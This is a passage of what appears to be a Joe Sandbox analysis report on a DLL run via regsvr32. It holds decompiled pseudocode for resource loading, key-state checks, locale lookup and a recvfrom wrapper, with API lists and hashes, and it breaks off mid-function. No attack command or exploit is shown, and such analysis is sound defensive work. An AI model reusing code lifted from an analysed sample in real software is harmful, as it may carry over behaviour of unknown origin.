                                                                                                                                                                            0x10012748
                                                                                                                                                                            0x1001274f
                                                                                                                                                                            0x1001274f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10012755
                                                                                                                                                                            0x1001270e
                                                                                                                                                                            0x1001271b
                                                                                                                                                                            0x10012723
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10012727
                                                                                                                                                                            0x1001272d
                                                                                                                                                                            0x10012731
                                                                                                                                                                            0x1001273a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001273a
                                                                                                                                                                            0x1001275b

                                                                                                                                                                            APIs
                                                                                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                                            • Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
                                                                                                                                                                            • Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
                                                                                                                                                                            • Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
                                                                                                                                                                            • Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E1000FF59(void* __ecx) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            				void* _t19;
                                                                                                                                                                            
                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                            				if((E10012862(__ecx) & 0x40000000) != 0) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                            					return  ~( ~_t5);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t19 = E1000A7CE();
                                                                                                                                                                            				if(_t19 == 0) {
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t18 = GetKeyState;
                                                                                                                                                                            				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            			}









                                                                                                                                                                            0x1000ff5c
                                                                                                                                                                            0x1000ff68
                                                                                                                                                                            0x1000ffb0
                                                                                                                                                                            0x1000ffb2
                                                                                                                                                                            0x1000ffb9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ffbb
                                                                                                                                                                            0x1000ff6f
                                                                                                                                                                            0x1000ff73
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ff75
                                                                                                                                                                            0x1000ff82
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ff96
                                                                                                                                                                            0x1000ffa5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ffad

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 1000FF7D
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 1000FF86
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 1000FF8F
                                                                                                                                                                            • SendMessageA.USER32 ref: 1000FFA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$LongMessageSendWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1063413437-0
                                                                                                                                                                            • Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
                                                                                                                                                                            • Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
                                                                                                                                                                            • Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                            			E10027704() {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t8;
                                                                                                                                                                            				intOrPtr* _t15;
                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                            				char _t20;
                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                            				int _t25;
                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                            
                                                                                                                                                                            				_t8 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v8 = _t8 ^ _t27;
                                                                                                                                                                            				_t24 = 0;
                                                                                                                                                                            				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t25 = GetACP();
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t20 = _v16;
                                                                                                                                                                            					_t15 =  &_v16;
                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                            						goto L4;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						do {
                                                                                                                                                                            							_t15 = _t15 + 1;
                                                                                                                                                                            							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                                                                                                                                            							_t20 =  *_t15;
                                                                                                                                                                            						} while (_t20 != 0);
                                                                                                                                                                            						if(_t24 == 0) {
                                                                                                                                                                            							goto L4;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                                                                                                                                            			}















                                                                                                                                                                            0x1002770a
                                                                                                                                                                            0x10027711
                                                                                                                                                                            0x10027715
                                                                                                                                                                            0x10027731
                                                                                                                                                                            0x10027752
                                                                                                                                                                            0x10027758
                                                                                                                                                                            0x10027733
                                                                                                                                                                            0x10027733
                                                                                                                                                                            0x10027738
                                                                                                                                                                            0x1002773b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1002773d
                                                                                                                                                                            0x1002773d
                                                                                                                                                                            0x10027743
                                                                                                                                                                            0x10027744
                                                                                                                                                                            0x10027748
                                                                                                                                                                            0x1002774a
                                                                                                                                                                            0x10027750
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10027750
                                                                                                                                                                            0x1002773b
                                                                                                                                                                            0x10027768

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 10027717
                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10027729
                                                                                                                                                                            • GetACP.KERNEL32 ref: 10027752
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4232894706-0
                                                                                                                                                                            • Opcode ID: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
                                                                                                                                                                            • Instruction ID: 66289914fabe9bf2d1b1abcf1e27b8b8f35a8bed3fb6bd80cc0c1702fed1c004
                                                                                                                                                                            • Opcode Fuzzy Hash: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
                                                                                                                                                                            • Instruction Fuzzy Hash: DCF0C231E042785BE701DB7598556EF77E4FF04B90B9101ADEC86E7280D720AE0987C4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E1000D804(struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                            				struct _WINDOWPLACEMENT _v48;
                                                                                                                                                                            				int _t16;
                                                                                                                                                                            
                                                                                                                                                                            				if(E1000D6C3() == 0) {
                                                                                                                                                                            					if((_a8 & 0x00000003) == 0) {
                                                                                                                                                                            						if(IsIconic(_a4) == 0) {
                                                                                                                                                                            							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t16 = GetWindowPlacement(_a4,  &_v48);
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							return E1000D7B8( &(_v48.rcNormalPosition), _a8);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0x12340042;
                                                                                                                                                                            				}
                                                                                                                                                                            				return  *0x1005a754(_a4, _a8);
                                                                                                                                                                            			}





                                                                                                                                                                            0x1000d811
                                                                                                                                                                            0x1000d825
                                                                                                                                                                            0x1000d839
                                                                                                                                                                            0x1000d851
                                                                                                                                                                            0x1000d83b
                                                                                                                                                                            0x1000d842
                                                                                                                                                                            0x1000d842
                                                                                                                                                                            0x1000d859
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d85b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d862
                                                                                                                                                                            0x1000d859
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d827
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
                                                                                                                                                                            • Instruction ID: 387a2a710324106c5c2e9ba8f0dac284bfb83953cc403e56f04fca2c0ded1ab9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 71F0C935504209AAFF01EF61CC489AE7BA9EF043D4B10C026FC19D5068DB35DA559BA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                            			E1001FC43(void* __eax, void* __ebx, void* __edx) {
                                                                                                                                                                            				_Unknown_base(*)()* _t8;
                                                                                                                                                                            
                                                                                                                                                                            				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                                                                                                                                            				_t8 = SetUnhandledExceptionFilter(E1001BD6F());
                                                                                                                                                                            				 *0x1005b670 = 0;
                                                                                                                                                                            				return _t8;
                                                                                                                                                                            			}




                                                                                                                                                                            0x1001fc48
                                                                                                                                                                            0x1001fc58
                                                                                                                                                                            0x1001fc5e
                                                                                                                                                                            0x1001fc65

                                                                                                                                                                            APIs
                                                                                                                                                                            • __decode_pointer.LIBCMT ref: 1001FC51
                                                                                                                                                                              • Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840), ref: 1001BD7C
                                                                                                                                                                              • Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(00000006,?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001), ref: 1001BD93
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001FC58
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958600898-0
                                                                                                                                                                            • Opcode ID: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
                                                                                                                                                                            • Instruction ID: 8c383471f53841a55e0fcdb182c1f4564aa38491823c170ddba15b1e5c66fe32
                                                                                                                                                                            • Opcode Fuzzy Hash: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
                                                                                                                                                                            • Instruction Fuzzy Hash: E0C04C59818ED49AE715DF745C9D70D7F14E712508FD40589D480851A2DE6CA049C931
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                            			E100012D0(intOrPtr __ecx, void* _a4) {
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				void _v1044;
                                                                                                                                                                            				intOrPtr _v1048;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                            				signed int _t41;
                                                                                                                                                                            
                                                                                                                                                                            				_t19 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v12 = _t19 ^ _t41;
                                                                                                                                                                            				_v1048 = __ecx;
                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                            				_v8 = 0x10;
                                                                                                                                                                            				__imp__#17( &_v1044, 0x400, 0, _v1048 + 0x14,  &_v8);
                                                                                                                                                                            				_v20 = _v1048;
                                                                                                                                                                            				 *((char*)(_t41 + _v20 - 0x410)) = 0;
                                                                                                                                                                            				memcpy(_a4,  &_v1044, 0x101 << 2);
                                                                                                                                                                            				return E100167D5(_a4, _t26, _v12 ^ _t41, _v20,  &_v1044 + 0x202,  &_v1044,  *((intOrPtr*)(_v1048 + 0x24)));
                                                                                                                                                                            			}













                                                                                                                                                                            0x100012d9
                                                                                                                                                                            0x100012e0
                                                                                                                                                                            0x100012e5
                                                                                                                                                                            0x100012eb
                                                                                                                                                                            0x100012f2
                                                                                                                                                                            0x1000131f
                                                                                                                                                                            0x10001325
                                                                                                                                                                            0x1000132b
                                                                                                                                                                            0x10001341
                                                                                                                                                                            0x10001355

                                                                                                                                                                            APIs
                                                                                                                                                                            • recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 1000131F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: recvfrom
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 846543921-0
                                                                                                                                                                            • Opcode ID: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
                                                                                                                                                                            • Instruction ID: bec5cb5057db5f544406cf49396100538fbf28fc5aa5dd8def6f1e45c3881569
                                                                                                                                                                            • Opcode Fuzzy Hash: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
                                                                                                                                                                            • Instruction Fuzzy Hash: 830112F5A0011C9FDB14CF58CD54BDEB7B8FF88314F4045A9E609A7241D7B4AA84CBA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                            				struct HINSTANCE__* _t78;
                                                                                                                                                                            				_Unknown_base(*)()* _t79;
                                                                                                                                                                            				struct HINSTANCE__* _t81;
                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                            				signed int _t94;
                                                                                                                                                                            				unsigned int _t97;
                                                                                                                                                                            				void* _t113;
                                                                                                                                                                            				unsigned int _t115;
                                                                                                                                                                            				signed short _t123;
                                                                                                                                                                            				unsigned int _t124;
                                                                                                                                                                            				_Unknown_base(*)()* _t131;
                                                                                                                                                                            				signed short _t133;
                                                                                                                                                                            				unsigned int _t134;
                                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                                            				void* _t144;
                                                                                                                                                                            				int _t145;
                                                                                                                                                                            				int _t146;
                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                            				void* _t167;
                                                                                                                                                                            				signed int _t169;
                                                                                                                                                                            				void* _t170;
                                                                                                                                                                            				int _t172;
                                                                                                                                                                            				signed int _t176;
                                                                                                                                                                            				void* _t177;
                                                                                                                                                                            				CHAR* _t181;
                                                                                                                                                                            				void* _t183;
                                                                                                                                                                            				void* _t184;
                                                                                                                                                                            
                                                                                                                                                                            				_t167 = __edx;
                                                                                                                                                                            				_t184 = _t183 - 0x118;
                                                                                                                                                                            				_t181 = _t184 - 4;
                                                                                                                                                                            				_t73 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_t181[0x118] = _t73 ^ _t181;
                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                            				E10017BC1(E10027E56, __ebx, __edi, __esi);
                                                                                                                                                                            				_t169 = 0;
                                                                                                                                                                            				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                                                                            				 *(_t181 - 0x14) = 0;
                                                                                                                                                                            				 *(_t181 - 0x10) = 0;
                                                                                                                                                                            				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                            				 *(_t181 - 0x18) = _t78;
                                                                                                                                                                            				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                                                                            				if(_t79 == 0) {
                                                                                                                                                                            					if(GetVersion() >= 0) {
                                                                                                                                                                            						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                                                                            						if(_t81 != 0) {
                                                                                                                                                                            							 *(_t181 - 0x14) = 0;
                                                                                                                                                                            							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
                                                                                                                                                                            							if( *(_t181 - 0x14) != 0) {
                                                                                                                                                                            								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                                                                            								_t145 = _t97 & 0x3ff;
                                                                                                                                                                            								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                                                                            								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                                                                            								 *(_t181 - 0x10) = 2;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *(_t181 - 0x18) = 0;
                                                                                                                                                                            						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                                                                            							 *(_t181 - 0x44) = 0x10;
                                                                                                                                                                            							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                                                                            								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                                                                            								_t184 = _t184 + 0xc;
                                                                                                                                                                            								if(_t113 == 1) {
                                                                                                                                                                            									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                                                                            									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                                                                            									_t146 = _t115 & 0x3ff;
                                                                                                                                                                            									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                                                                            									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                                                                            									 *(_t181 - 0x10) = 2;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							RegCloseKey( *(_t181 - 0x18));
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                                                                            					 *(_t181 - 0x14) = _t123;
                                                                                                                                                                            					_t124 = _t123 & 0x0000ffff;
                                                                                                                                                                            					_t164 = _t124 & 0x3ff;
                                                                                                                                                                            					 *(_t181 - 0x1c) = _t164;
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                                                                            					 *(_t181 - 0x10) = 2;
                                                                                                                                                                            					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                                                                            					if(_t131 != 0) {
                                                                                                                                                                            						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                                                                            						 *(_t181 - 0x14) = _t133;
                                                                                                                                                                            						_t134 = _t133 & 0x0000ffff;
                                                                                                                                                                            						_t172 = _t134 & 0x3ff;
                                                                                                                                                                            						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                                                                            						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                                                                            						 *(_t181 - 0x10) = 4;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t169 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                                                                            				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                                                                            				_t181[0x105] = 0;
                                                                                                                                                                            				_t181[0x104] = 0;
                                                                                                                                                                            				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                                                                            					_t143 = 0x20;
                                                                                                                                                                            					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                                                                            					 *(_t181 - 0x5c) = _t181;
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                                                                            					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                                                                            					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
                                                                                                                                                                            					 *(_t181 - 4) = _t169;
                                                                                                                                                                            					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                                                                            						E1000A2DF(_t181 - 0x3c);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t176 = 0;
                                                                                                                                                                            					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                                                                            						L23:
                                                                                                                                                                            						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                                                                            						E1000A8D0(_t181 - 0x3c);
                                                                                                                                                                            						_t92 = _t169;
                                                                                                                                                                            						goto L24;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
                                                                                                                                                                            							if(_t94 != _t169) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t176 =  &(1[_t176]);
                                                                                                                                                                            							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L23;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t169 = _t94;
                                                                                                                                                                            						goto L23;
